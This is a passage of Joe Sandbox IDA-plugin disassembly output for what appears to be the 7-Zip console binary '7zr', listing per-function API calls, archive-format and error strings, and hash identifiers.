                            • Part of subcall function 0018297F: memcpy.MSVCRT(?,?,?,?,?,001A50A5,?,?), ref: 001829B2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfreememcpy
                          • String ID: @PathCut/_pc_$L$PaxHeader/@PaxHeader$atime$crc32/$ctime$devmajor$devminor$gid$gname$linkpath$mtime$path$root$size$uid$uname
                          • API String ID: 2037215848-4204487407
                          • Opcode ID: 1a679aa5a676006030170fdfc2a6a5d5306bca537452b25eedf91a99a70f2622
                          • Instruction ID: 1e33451a860ade2344e10f855c7d2e81e1bd82831f5e0cdfd822cee91960d623
                          • Opcode Fuzzy Hash: 1a679aa5a676006030170fdfc2a6a5d5306bca537452b25eedf91a99a70f2622
                          • Instruction Fuzzy Hash: A302BF70900A89DFDB26DF55C890AADFBB5BF29304F5441AED049A3242D770AEC9CB61
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 0018C09E
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 0018C0BB
                          • memcmp.MSVCRT(?,00230348,00000010), ref: 0018C0CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: e95d0d0871ded2c52168c0eca4d5584046ceb2faf5dfabb5ce50ff37ce01f160
                          • Instruction ID: ceb417b80132871cc72e7395621b8073df7341f6000d05647db9c4966179c8de
                          • Opcode Fuzzy Hash: e95d0d0871ded2c52168c0eca4d5584046ceb2faf5dfabb5ce50ff37ce01f160
                          • Instruction Fuzzy Hash: C2917B72650614ABD764AA25DC85FAB73A8EF66750F008029FD4AE7241F730AE54CFF0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                          • API String ID: 3519838083-1909666238
                          • Opcode ID: 400702ee5639ed0a2cf69c7faeb5b284bbd74fe9127b009f0517fa5082ab6a7f
                          • Instruction ID: e572251b969658b0cde41ad7b1641512f0f8abe066f285be80c204fac41f61a8
                          • Opcode Fuzzy Hash: 400702ee5639ed0a2cf69c7faeb5b284bbd74fe9127b009f0517fa5082ab6a7f
                          • Instruction Fuzzy Hash: 9EC1B231D14AC59FCB19EFA6C855EFD7BB1EF12300F5A80A9E0496B262D730AE45DB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: -Cert$:eos$AES$Central$Descriptor_ERROR$Local$StrongCrypto$ZipCrypto$p,#
                          • API String ID: 3519838083-3087170221
                          • Opcode ID: e2febadceaabdefb4ba1163ef61d9e6fda84f3156c42e3af46904f3b9eeb44c3
                          • Instruction ID: 46c8aa8179172b11e9bcfab13dfc80a08967c04891c5f2af085166d6da00fe86
                          • Opcode Fuzzy Hash: e2febadceaabdefb4ba1163ef61d9e6fda84f3156c42e3af46904f3b9eeb44c3
                          • Instruction Fuzzy Hash: 19F1FA31900A889BCF2AEFA5C951AFEBBB5BF25714F180419F44273192DB349F46DB60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: $ $$ #$.$:mem$Delta$LZMA$LZMA2$o
                          • API String ID: 3519838083-1172921480
                          • Opcode ID: 24d39f0a3d5949b05854dd84ccb1cde5fd5dfcf3ceb2957bba69c3a27d4d3abd
                          • Instruction ID: c732d73bde0ef5ed163f62bd44fea8d33421abd580b5b2804fd51623a16db6be
                          • Opcode Fuzzy Hash: 24d39f0a3d5949b05854dd84ccb1cde5fd5dfcf3ceb2957bba69c3a27d4d3abd
                          • Instruction Fuzzy Hash: 2DD1DE31D0026D8ACF25CFA8C895BEEBBB2BF69304F24416DD859AB241D771DE05CB91
                          APIs
                          • __EH_prolog.LIBCMT ref: 001864F8
                          • GetCurrentThreadId.KERNEL32 ref: 00186508
                          • GetTickCount.KERNEL32 ref: 00186513
                          • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0018651E
                          • GetTickCount.KERNEL32 ref: 00186578
                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 001865C5
                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 001865EC
                            • Part of subcall function 00185D7A: __EH_prolog.LIBCMT ref: 00185D7F
                            • Part of subcall function 00185D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00185DA1
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                          • String ID: .tmp$d
                          • API String ID: 1989517917-2797371523
                          • Opcode ID: b6c5100e9186a2e0ffd2b7be0348de255bacc1e1acc86e3f5c0a432654f1afc0
                          • Instruction ID: 95caeb4e25ce6efb72efaced836a2fc7700b001c89ee07e809d5d0ed6fd67c13
                          • Opcode Fuzzy Hash: b6c5100e9186a2e0ffd2b7be0348de255bacc1e1acc86e3f5c0a432654f1afc0
                          • Instruction Fuzzy Hash: C041F332910124ABDF19BFA0E85A7ED77B1FF25354F244129E806AB2A1CB348B51CF51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                          • API String ID: 1795875747-657955069
                          • Opcode ID: 313120d64254d7fb3a294df8aecc13b1f69f1dd83f4fafa9b4cf789e943f9b6a
                          • Instruction ID: 9429de16f620428f461803867c70c2e6473afd6c6e0f8298a8a6375a7cf40542
                          • Opcode Fuzzy Hash: 313120d64254d7fb3a294df8aecc13b1f69f1dd83f4fafa9b4cf789e943f9b6a
                          • Instruction Fuzzy Hash: 7EF0A732A041287BCA2027D57E85D6EFF6DDF96761B240037FA0443291EF611C719FA1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CE774
                            • Part of subcall function 00183563: memmove.MSVCRT(?,?,00000022,00000000,?,00181DAE,00000000,00000000,00000000,00181D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 00183588
                            • Part of subcall function 001CE6C2: __EH_prolog.LIBCMT ref: 001CE6C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$memmove
                          • String ID: H #$P #$T #$\ #$hcf$mtf$rsfx
                          • API String ID: 593149739-3503103369
                          • Opcode ID: ac1dcf83aac06fdc0313a8f85a66ea86043e3b0ad5a03dcbf179569aca52e7c3
                          • Instruction ID: 9a0032299844f6325150bc018bdb215647b0860babc9c59446286e0564d31b13
                          • Opcode Fuzzy Hash: ac1dcf83aac06fdc0313a8f85a66ea86043e3b0ad5a03dcbf179569aca52e7c3
                          • Instruction Fuzzy Hash: 1D519131904245DBCF25EBA0C491FBEB3B2AB74318F14852DEC625B292DB74DE09DB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 00196B63
                            • Part of subcall function 00194D92: __EH_prolog.LIBCMT ref: 00194D97
                            • Part of subcall function 00187DF8: __EH_prolog.LIBCMT ref: 00187DFD
                          Strings
                          • Dangerous link path was ignored, xrefs: 00196BE5
                          • Internal error for symbolic link file, xrefs: 00196D53
                          • Incorrect path, xrefs: 00196C46
                          • Cannot fill link data, xrefs: 00196D1E
                          • Empty link, xrefs: 00196C21
                          • Dangerous symbolic link path was ignored, xrefs: 00196CCB
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                          • API String ID: 3519838083-3151419218
                          • Opcode ID: d7cec4b2547b18f06b08f370f610f6eb32bdde38867b74aa74b452755b651bea
                          • Instruction ID: 009ae73248ce600ed6a8405815240d655f123c0715c417bb2f972a381903ee87
                          • Opcode Fuzzy Hash: d7cec4b2547b18f06b08f370f610f6eb32bdde38867b74aa74b452755b651bea
                          • Instruction Fuzzy Hash: 6371B175A00249AFCF16EBE0D8519EEBBB5EF29304F108029F89563252DB315A19DB71
                          APIs
                            • Part of subcall function 00217D80: WaitForSingleObject.KERNEL32(?,000000FF,0019AFD6,?), ref: 00217D83
                            • Part of subcall function 00217D80: GetLastError.KERNEL32(?,000000FF,0019AFD6,?), ref: 00217D8E
                            • Part of subcall function 00212FB0: EnterCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FB8
                            • Part of subcall function 00212FB0: LeaveCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FC2
                          • EnterCriticalSection.KERNEL32(?), ref: 0021290E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212928
                          • EnterCriticalSection.KERNEL32(?), ref: 00212992
                          • LeaveCriticalSection.KERNEL32(?), ref: 002129B8
                          • EnterCriticalSection.KERNEL32(?), ref: 00212A1E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212A56
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                          • String ID: v
                          • API String ID: 2116739831-3261393531
                          • Opcode ID: d1720dd28bfe0461dc0fe5b0f0c4a82d3249f5383e919330dbe15c1fe2a8bdf6
                          • Instruction ID: f563a73ba7cc7f22f862615bf98113d7e92807a2eb59de73b2e280addf311f75
                          • Opcode Fuzzy Hash: d1720dd28bfe0461dc0fe5b0f0c4a82d3249f5383e919330dbe15c1fe2a8bdf6
                          • Instruction Fuzzy Hash: A0C16D75514706CFC320DF28C580BA7B7E2FFA8314F15492DE9AA87251EB30E9A9CB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A4B61
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfree
                          • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                          • API String ID: 1978129608-4104380264
                          • Opcode ID: ac0ab5d0729809a0158b595a72b70d5017d89ef56c60330a417ea1dda5c9cd59
                          • Instruction ID: 2fa0b311f1ddcb006a50d04ac4300719683d6712b341888abf107b9bb739aa1c
                          • Opcode Fuzzy Hash: ac0ab5d0729809a0158b595a72b70d5017d89ef56c60330a417ea1dda5c9cd59
                          • Instruction Fuzzy Hash: BCB1D335804248EFCF22EFA4C581BEDBBB1BF66304F24449DE54567182CBB69E49CB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfputs
                          • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                          • API String ID: 1798449854-1259944392
                          • Opcode ID: 6d430c1d1fed7685c6c0fb7e9a32ddbcb182d0643847ae28024dbeef1f711962
                          • Instruction ID: 685373b7daa8407940a1c832a7070a485becfec703bb035683897350634ab3f7
                          • Opcode Fuzzy Hash: 6d430c1d1fed7685c6c0fb7e9a32ddbcb182d0643847ae28024dbeef1f711962
                          • Instruction Fuzzy Hash: 01219532A00514AFCB15EB94D5429FEB3B9FF78310F000079E516D76A1DB74AE568F80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: exit$CriticalSection$EnterLeave
                          • String ID: v
                          • API String ID: 43521-3261393531
                          • Opcode ID: e3793f3dd941bcb2f47c07379a8e93897b29bdefbcf5e9d92de3ff6e05ba647c
                          • Instruction ID: b2a6f95ed46fb044b371a966a4b74039547986abe778a54d66bf4100fa7d8df1
                          • Opcode Fuzzy Hash: e3793f3dd941bcb2f47c07379a8e93897b29bdefbcf5e9d92de3ff6e05ba647c
                          • Instruction Fuzzy Hash: 2D110971510B019FC770EFA1C981596F7F1BF54704B404A2EE1C742A82DBB4B59ACF91
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001869C8
                          • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 001869DC
                          • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 001869E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                          • API String ID: 667068680-4044117955
                          • Opcode ID: 13e50073a0a836aa7594b019f3c4505c0f865f309b1b2d3b6fe91c19616a5736
                          • Instruction ID: 94f65505ca70a5fe9f0e4a8fd7700a7af2c557a5ad3e147e19eb2d0697b7fee2
                          • Opcode Fuzzy Hash: 13e50073a0a836aa7594b019f3c4505c0f865f309b1b2d3b6fe91c19616a5736
                          • Instruction Fuzzy Hash: AAE08671A11124BF531457EA7C4E92AAAACDA86BA03B2002BF404E3360D6F068355EA1
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001C28EA
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001C2907
                          • memcmp.MSVCRT(?,002302D8,00000010), ref: 001C291A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: 17fcdeb9e57dd0df3f82f5035c088ce5d1d661ce4025699aab93d18a1535307c
                          • Instruction ID: 2c2203035638a252944b1aa6ea1ddf4a2e7b9c7e9d2af371c859466712a5de2e
                          • Opcode Fuzzy Hash: 17fcdeb9e57dd0df3f82f5035c088ce5d1d661ce4025699aab93d18a1535307c
                          • Instruction Fuzzy Hash: BC31A0B2750218ABE7088A10CD82FBF73E89B71798F018129FD459B241F775DD5097E1
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186A7D
                            • Part of subcall function 00186848: FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          • SetLastError.KERNEL32(00000078,00000000,?,?), ref: 00186AA6
                          • SetLastError.KERNEL32(00000000,00000000,?,?), ref: 00186AB2
                          • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00186AD3
                          • GetLastError.KERNEL32(?,?), ref: 00186AE0
                          • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00186B1C
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorFindLast$FirstStream$CloseH_prolog
                          • String ID:
                          • API String ID: 1050961465-0
                          • Opcode ID: 4a20e18795ee7961136e935959afdd342d95d441f575f52d4111d56de88d3621
                          • Instruction ID: 6cb0d295ccd3698e66809e13d498f22493c73cb65d08c7cfb1b1d5818ac148a0
                          • Opcode Fuzzy Hash: 4a20e18795ee7961136e935959afdd342d95d441f575f52d4111d56de88d3621
                          • Instruction Fuzzy Hash: 6D21C570600105EBCB25BF60D9898AEBBB9FF91368F104219F85593190DB314F8ADF10
                          APIs
                          • fputs.MSVCRT ref: 001BCCC2
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001BCE43
                            • Part of subcall function 00181F91: fflush.MSVCRT ref: 00181F93
                          • fputs.MSVCRT ref: 001BCD75
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prologfflushfputc
                          • String ID: ERRORS:$WARNINGS:
                          • API String ID: 1876658717-3472301450
                          • Opcode ID: 49515606a065e3864724f30751b46d35a52e0e228161519a5763f12938494ea7
                          • Instruction ID: 2d6dac0ca50a8783d50d1c4079fe50e00f822954c396fc41e047592e1912913e
                          • Opcode Fuzzy Hash: 49515606a065e3864724f30751b46d35a52e0e228161519a5763f12938494ea7
                          • Instruction Fuzzy Hash: E5717035600701EFDB24FFA1D895BEABBA6AF54300F14843DE95A87251CB70AD45CF91
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A091
                            • Part of subcall function 00189BAA: RegCloseKey.ADVAPI32(?,?,00189BA0), ref: 00189BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseH_prolog
                          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                          • API String ID: 1579395594-270022386
                          • Opcode ID: 643e065fadab545d66f62cae499f0d74275eda3b498a34aca89ef6873d70ef8b
                          • Instruction ID: b2016f8a48e4065f0a01a5b914d898e89904d9eeec12eb17260c76f0b8d6b65b
                          • Opcode Fuzzy Hash: 643e065fadab545d66f62cae499f0d74275eda3b498a34aca89ef6873d70ef8b
                          • Instruction Fuzzy Hash: 3551B171E00205AFDF11FF98D8969AEB7B5BF69300F90442EE512A7241DB30AB05CF92
                          APIs
                          • __EH_prolog.LIBCMT ref: 001DC453
                            • Part of subcall function 001DC1DF: __EH_prolog.LIBCMT ref: 001DC1E4
                            • Part of subcall function 001DC543: __EH_prolog.LIBCMT ref: 001DC548
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID: ((#$<(#$L(#$\(#
                          • API String ID: 3744649731-2556618110
                          • Opcode ID: 3c1abce54a5b516f763d2377647d23bddea83e0c2d1ed516cfcd170b31d72df9
                          • Instruction ID: 90293784ef1a7f01c12fe1fd2dc17fe5fc8b4f991175c6fdc85df8df57bb8140
                          • Opcode Fuzzy Hash: 3c1abce54a5b516f763d2377647d23bddea83e0c2d1ed516cfcd170b31d72df9
